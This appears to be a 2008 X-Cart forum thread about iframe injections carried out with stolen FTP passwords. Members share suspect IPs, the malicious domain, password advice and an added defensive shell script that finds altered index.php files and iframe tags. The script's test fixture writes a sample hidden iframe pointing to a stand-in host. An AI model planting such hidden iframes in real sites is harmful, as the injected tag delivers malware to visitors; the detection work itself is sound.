X-Cart: shopping cart software

X-Cart forums (https://forum.x-cart.com/index.php)
-   News and Announcements (https://forum.x-cart.com/forumdisplay.php?f=28)
-   -   Warning: Iframe based attacks using stolen FTP access info (https://forum.x-cart.com/showthread.php?t=43161)

balinor 10-22-2008 10:27 AM

Warning: Iframe based attacks using stolen FTP access info
 
There seems to be a hacker out there (looks like they are from Egypt) targeting X-Cart sites with iframe based attacks. Basically they are gaining FTP access to a site and adding an iframe to existing index files, or adding new index files in all of the directories. The iframe loads a virus to anyone who accesses the site, both the admin side and the customer side. As you can imagine, this can be extremely damaging to your store if all of your customers get hit with this virus (particularly if they don't have anti-virus software). If you suddenly start to get a 'secure and insecure' warning in the admin, and see something loading other than your domain, close your browser immediately and contact your host.

The accounts that were hacked (the ones I know of) had FTP passwords that are just about impossible to hack, which means the account data was stolen/intercepted. Where it was stolen from is something that a few others and I are investigating as we speak.

In any event, now would be a VERY good time to change your FTP password, particularly if you have had work done on your site by anyone outside your organization. This can usually be done via your host's control panel.

You can also block these specific IP addresses which seem to be the source of some of the attacks (although these are probably just a proxy):

41.232.70.12
41.232.70.190
41.232.69.30
41.232.69.144

This is a serious threat, so please treat it as such - don't just dismiss this as 'it can't happen to me'.

photo 10-22-2008 10:36 AM

Re: Warning: Iframe based attacks using stolen FTP access info
 
In my version (4.1.10) the following security measure is implemented in the config.php file.

Code:

#
# The constant FRAME_NOT_ALLOWED forbids calling X-Cart in IFRAME / FRAME tags.
# If you do not use X-Cart in any pages where X-Cart is displayed through a
# frame, this option can be enabled to enhance security. This option prevents
# attacks in which the attacker displays X-Cart through a frame and, using web
# browser vulnerabilities, intercepts the information being entered in it.
#
define("FRAME_NOT_ALLOWED", true);


Should this not stop the attack which you are talking about?

balinor 10-22-2008 10:37 AM

Re: Warning: Iframe based attacks using stolen FTP access info
 
Na, that keeps X-Cart from being shown IN an Iframe, I don't think it prevents an iframe from being shown IN X-Cart...

Emerson 10-22-2008 10:38 AM

Re: Warning: Iframe based attacks using stolen FTP access info
 
photo, that prevents the shopping cart from being displayed within an iframe.

photo 10-22-2008 10:41 AM

Re: Warning: Iframe based attacks using stolen FTP access info
 
I see. Were these hacks in the latest versions (4.1.10 & 4.1.11) of X-Cart?

pauldodman 10-22-2008 11:47 AM

Re: Warning: Iframe based attacks using stolen FTP access info
 
I've seen the hacks in 4.0 sites and the latest 4.1 sites, with hackersafe and every security measure possible, including ftp p/ws of strength 100.

photo 10-22-2008 11:51 AM

Re: Warning: Iframe based attacks using stolen FTP access info
 
Quote:

Originally Posted by pauldodman
I've seen the hacks in 4.0 sites and the latest 4.1 sites, with hackersafe and every security measure possible, including ftp p/ws of strength 100.


That is not good. Hopefully someone can figure out how these clowns are getting the access info.

finerpeter 10-22-2008 11:52 AM

Re: Warning: Iframe based attacks using stolen FTP access info
 
Wow, that's a serious compromise....

Thanks for letting us know Padraic!

Emerson 10-22-2008 11:53 AM

Re: Warning: Iframe based attacks using stolen FTP access info
 
Paul,

What I've seen are iframes loading a live-counter URL. Is that what you have seen as well?

photo,
This is not an x-cart vulnerability but FTP passwords are being leaked somewhere.

finerpeter 10-22-2008 12:01 PM

Re: Warning: Iframe based attacks using stolen FTP access info
 
How do you mean Emerson?

photo 10-22-2008 12:01 PM

Re: Warning: Iframe based attacks using stolen FTP access info
 
Quote:

Originally Posted by Emerson
photo,
This is not an x-cart vulnerability but FTP passwords are being leaked somewhere.


Is this issue possibly related to certain server control panels like Cpanel?

Emerson 10-22-2008 12:23 PM

Re: Warning: Iframe based attacks using stolen FTP access info
 
Quote:

Originally Posted by photo
Is this issue possibly related to certain server control panels like Cpanel?


photo,
It is a possibility, but I am leaning more towards a source of logins having been breached.
We had 4 cases here, and at first I thought maybe our system was compromised, but after further investigation it was concluded that those logins were not available in our system.
So either a helpdesk somewhere has been hacked or e-mails are being intercepted somewhere.
Still investigating, as we do not have much information to pinpoint the source of the problem, and that is one of the reasons for this thread, so we can get as much information as possible.

We are instructing our customers to not give out their FTP logins to anyone, instead they should create a separate login and once the work is done they can delete that login.

finerpeter 10-22-2008 12:27 PM

Re: Warning: Iframe based attacks using stolen FTP access info
 
I would presume that the largest concentration of logins and passwords would be with X-Cart tech support. I hope that is not compromised. That would truly be a catastrophe.

Edit: Come to think of it, I'm guessing X-Cart recommended hosts would have quite a few number of ftp passwords too in their systems. We know that Emerson's safe so it would be great if the other companies can confirm their status too.

balinor 10-22-2008 01:21 PM

Re: Warning: Iframe based attacks using stolen FTP access info
 
Yea, this is clearly not an X-Cart vulnerability - but pure information theft. Emerson's servers are locked up tight, so it has to be a leak somewhere.

gb2world 10-22-2008 02:04 PM

Re: Warning: Iframe based attacks using stolen FTP access info
 
I got hit too. I am at Hands-On - so it seems not likely a vulnerability with the hosts.

I never give out the root ftp passwords, but have created ftp accounts for QT and various vendors - perhaps the compromise was there. My host is suggesting they may have intercepted email somehow. I did email ftp information to some vendors.

I saw the iframe edit in the main index file - am putting in a ticket to find all index files that were modified recently. (I don't have shell access - so I am having to look at directories one by one. So far - I have not found anything else.)

Can anyone describe any other files or functionality that were modified? I'll be looking at all files that were changed today.

balinor 10-22-2008 02:07 PM

Re: Warning: Iframe based attacks using stolen FTP access info
 
It is basically every index.php file - if they aren't in a directory, they were created - so look for any index.php file created or edited on the day of the hack.

Emerson 10-22-2008 02:08 PM

Re: Warning: Iframe based attacks using stolen FTP access info
 
Hi gb2world.

Seems that iframes were injected in all index files.
Talk to Hands On and have them take a look at your FTP logs and see if this is related.

Actually you can look at the FTP logs yourself. They are found in the access-logs directory in your home directory.
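
Two pieces of advice in this thread, balinor's "look for any index.php file created or edited on the day of the hack" and Emerson's "look at the FTP logs yourself", can be turned into a small triage script for anyone who does have a shell on the account. The following is an added example written for this page, not code from X-Cart or from anyone in the thread. It assumes the document root is passed as an argument and that the FTP log is in the common xferlog format (the exact path and format depend on the host); the files and log lines created by make_fixture are constructed for the demonstration and are not real data.

```shell
#!/bin/sh
# Added triage helpers for the iframe injection described in this thread.
# Example code written for this page, not X-Cart's code or anything posted
# by the thread's participants. Assumptions: the document root is $1; the
# FTP log is in xferlog format (one transfer per line, remote host in
# field 7, filename in field 9, direction "i" for an upload in field 12),
# which is common but host-specific.

# 1. Every index.php created or modified in the last $2 days (default 1).
#    Injected files were either edited or dropped into directories that had
#    no index.php before. An FTP client can preserve mtime when it uploads,
#    so also match on ctime, which an upload cannot set.
find_recent_index() {
  find "$1" -type f -name 'index.php' \( -mtime -"${2:-1}" -o -ctime -"${2:-1}" \)
}

# 2. Any PHP/HTML file under the document root containing an <iframe> tag
#    (case-insensitive, so IFRAME is caught too).
find_iframes() {
  find "$1" -type f \( -name '*.php' -o -name '*.html' -o -name '*.htm' \) \
    -exec grep -li '<iframe' {} + || true
}

# 3. FTP log lines from the addresses listed at the top of the thread.
#    They are probably proxies, so a hit is a lead, not proof.
SUSPECT_IPS='41.232.70.12 41.232.70.190 41.232.69.30 41.232.69.144'
ftp_hits() {
  for ip in $SUSPECT_IPS; do
    grep -Fw -- "$ip" "$1" || true
  done
}

# 4. Every upload in the FTP log, printed as "remote-host filename".
#    An upload from an address the site owner does not recognise is the
#    real signal, whatever the source IP turns out to be.
ftp_uploads() {
  awk '$12 == "i" { print $7, $9 }' "$1"
}

# Constructed fixture (not real data) so the helpers can be exercised offline:
# one clean index.php, one with an appended hidden frame, one dropped into a
# directory that had none, and three xferlog-style lines (two uploads from a
# listed IP, one download from an unrelated address).
make_fixture() {
  d=$(mktemp -d)
  mkdir -p "$d/shop/images" "$d/shop/skin1"
  printf '<?php\ninclude "./top.inc.php";\n' > "$d/shop/skin1/index.php"
  printf '<?php\ninclude "./top.inc.php";\n?>\n<IFRAME src="http://example.invalid/c" width="1" height="1"></IFRAME>\n' \
    > "$d/shop/index.php"
  printf '<iframe src="http://example.invalid/c"></iframe>\n' > "$d/shop/images/index.php"
  printf '%s\n' \
    'Wed Oct 22 03:14:07 2008 0 41.232.70.12 1234 /home/shop/public_html/index.php a _ i r shop ftp 0 * c' \
    'Wed Oct 22 03:14:09 2008 0 41.232.70.12 88 /home/shop/public_html/images/index.php a _ i r shop ftp 0 * c' \
    'Wed Oct 22 09:01:11 2008 0 192.0.2.10 4321 /home/shop/public_html/skin1/style.css a _ o r shop ftp 0 * c' \
    > "$d/ftp.log"
  echo "$d"
}
```

Against a real account, run `find_recent_index /path/to/public_html 1`, then `find_iframes` over the same root, and compare the results with `ftp_uploads` on the host's FTP log. A clean `find_iframes` result only means no iframe tag is present in those file types; anyone who had the FTP password could also read config.php, so the database password needs rotating regardless of what the scan finds.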

gb2world 10-22-2008 02:37 PM

Re: Warning: Iframe based attacks using stolen FTP access info
 
This is really bad. If they had full ftp access - They could also have picked up all the MYSQL password information. All that needs to be changed too. With access to the db - they can cause all sorts of mischief - and can have all customer information.

bigredseo 10-22-2008 02:38 PM

Re: Warning: Iframe based attacks using stolen FTP access info
 
We haven't had any reports of issues other than this one which we just received a ticket on.

I'm checking that server for issues currently, but the iFrame attacks really hadn't been present in over 2 years I think was the last time I've seen a rash of them.

Jon 10-22-2008 03:12 PM

Re: Warning: Iframe based attacks using stolen FTP access info
 
Quote:

Originally Posted by gb2world
This is really bad. If they had full ftp access - They could also have picked up all the MYSQL password information. All that needs to be changed too. With access to the db - they can cause all sorts of mischief - and can have all customer information.


For example, watch for users modifying the database, changing your CC processing to manual and then changing the admin orders email address to theirs.

bigredseo 10-22-2008 03:15 PM

Re: Warning: Iframe based attacks using stolen FTP access info
 
Nothing has been found on our servers at this time. We currently have an iframe scan in process on 67 of our ecommerce servers - so far, no results other than this one incident.

The only thing I can comment on at the moment is that if this was a normal iFrame attack then it could have been caused by a keylogger or something of that nature. There's a mini article on the iframe incidents located here: http://forums.cpanel.net/showthread.php?t=78595

The only other information I can contribute is that in the case of this one user the iframe linked to "live-counter.net" - again something that Emerson had mentioned previously. A scan of our servers for that combination in ANY user files has not shown to be present.

EDIT: I was just informed that the URL I posted goes to a forum that requires you to log in to view the posts. I have a shortened version of the post at our KB posted here: http://billing.handsonwebhosting.com/knowledgebase.php?action=displayarticle&catid=11&id=220

Donster 10-22-2008 03:45 PM

Re: Warning: Iframe based attacks using stolen FTP access info
 
I went into my DirectAdmin panel. I changed my password in three locations:
1. DirectAdmin Account
2. Main FTP Account
3. Main Database Account

That locked users out of the site. Is that because I should not change the Main Database Account, and if so how would one change that properly?

bigredseo 10-22-2008 03:47 PM

Re: Warning: Iframe based attacks using stolen FTP access info
 
did you remember to change the database password in the config.php file?

finerpeter 10-22-2008 03:48 PM

Re: Warning: Iframe based attacks using stolen FTP access info
 
Make sure to change the database password in your config.php file.

EDIT: beat me to it Conor :-)

Donster 10-22-2008 03:58 PM

Re: Warning: Iframe based attacks using stolen FTP access info
 
I was not even aware of it being there. New site and x-cart folks installed it. But I opened the file and see where to make the change.

How often should this be done?

Donster 10-22-2008 04:00 PM

Re: Warning: Iframe based attacks using stolen FTP access info
 
Y'all can smile cause when I browsed to our site and was locked out I had that "What the F!!!!" response, and corresponding flushed feeling of fear.

finerpeter 10-22-2008 04:00 PM

Re: Warning: Iframe based attacks using stolen FTP access info
 
It's always a good thing to periodically change your passwords, Donster. We deal with digital files, so we rotate our passwords once every few weeks for added security.

balinor 10-22-2008 04:05 PM

Re: Warning: Iframe based attacks using stolen FTP access info
 
And as a general rule, if you are allowing a third party to access your site, create a temporary account for them and delete it when they are done.

bigredseo 10-22-2008 04:42 PM

Re: Warning: Iframe based attacks using stolen FTP access info
 
finerpeter :) I just got lucky on the refresh I guess :)

As for how often to change files - personally, every 90 days. All our servers get passwords changed every 90 days, as do most of the sites I visit. It's too easy to hack passwords (especially ones that a person would make), so use a random password generator to make the passwords. Most passwords for scripts or logins should have a minimum of 8 characters and for added security even 12 or 16.

Just to follow up further on this iFrame issue we have so far scanned 126 of our servers and have not had any other references to the live-counter site. All our servers are scanned by ScanAlert and ControlScan for PCI Compliance, and neither have detected intrusions through the server end of things, so this exploit through iFrame is very VERY odd.

Emerson 10-22-2008 04:50 PM

Re: Warning: Iframe based attacks using stolen FTP access info
 
Yes, Scanalert scans all our servers too and has not picked up anything.

The more I search, the more bizarre this whole thing looks.
I just finished scanning all 54 servers we have, and it has only been a handful of sites affected. Very very odd indeed.

finerpeter 10-22-2008 05:27 PM

Re: Warning: Iframe based attacks using stolen FTP access info
 
Guys,
One hour ago I updated our passwords and then had to post them in the X-Cart support desk as well because they are helping me with a support issue.

Just right now I started getting a warning for the following when I go to our Admin:
INTRUSION: HTTP Malicious Toolkit Variant Activity
INTRUDER: localhost(2596)
RISK LEVEL: HIGH
ATTACKED IP: live-counter.net(86.121.116.243)
ATTACKED PORT: http(80)

What a coincidence huh? If they are getting access through passwords, how did they have access to the site just now?

Emerson 10-22-2008 05:30 PM

Re: Warning: Iframe based attacks using stolen FTP access info
 
Yup, I just visited your site and my anti-virus is picking it up. You are infected.

Do you have access to the logs on the server?
can you look at the time stamp on the files to see when it was last changed?

balinor 10-22-2008 05:34 PM

Re: Warning: Iframe based attacks using stolen FTP access info
 
Wow, that is scary.

finerpeter 10-22-2008 05:36 PM

Re: Warning: Iframe based attacks using stolen FTP access info
 
I don't know, I mean I'm checking the logs now to see what's going on.

Lowlife punks...

BCSE 10-22-2008 05:45 PM

Re: Warning: Iframe based attacks using stolen FTP access info
 
We have one client so far having this same problem. Does anyone know what virus they are trying to spread so we can help make sure our client's personal computers are clean? We've already cleaned the server from what we can tell but she's worried about her computer as Norton never gave her a warning about a virus.

I'll post any more information if I have it. So far I don't really have much to add to the thread. But I agree with this client that it looks like they got in via FTP and not via an X-Cart security vulnerability, even though they had the last 2 patches left to do, which were in the schedule to do when they found this hack. But I found no evidence so far of them utilizing the security issues to get in. They just came directly in via FTP from what we're seeing so far.

Carrie

balinor 10-22-2008 05:49 PM

Re: Warning: Iframe based attacks using stolen FTP access info
 
This is what was blocked by Norton for me:

http://securityresponse.symantec.com/security_response/writeup.jsp?docid=2005-042316-2917-99

Emerson 10-22-2008 05:52 PM

Re: Warning: Iframe based attacks using stolen FTP access info
 
Carrie,

most likely is a keylogger that will then send the hackers further access to anything you type on your computer.

bigredseo 10-22-2008 05:59 PM

Re: Warning: Iframe based attacks using stolen FTP access info
 
All servers completed the tests here at Hands-on - no servers affected except for the one as listed by the client earlier in this thread.

I have pasted the contents of the file on a testing server and had ScanAlert and SecurityMatrix both run a test on the server - neither were picking up the iFrame insert. I am still waiting on HackerProof and ControlScan to finish their scans on the server.

finerpeter 10-22-2008 05:59 PM

Re: Warning: Iframe based attacks using stolen FTP access info
 
The wonderful people at my hosting company Finestshops.com were able to locate all the infected files and they also confirmed as Emerson said that it was through FTP access.

Carrie, you may want your client to run Ad-Aware too, that's what we're doing right now on all of our computers...

BCSE 10-22-2008 06:01 PM

Re: Warning: Iframe based attacks using stolen FTP access info
 
This is really scary.

Has X-cart been notified of this potential breach?

Carrie

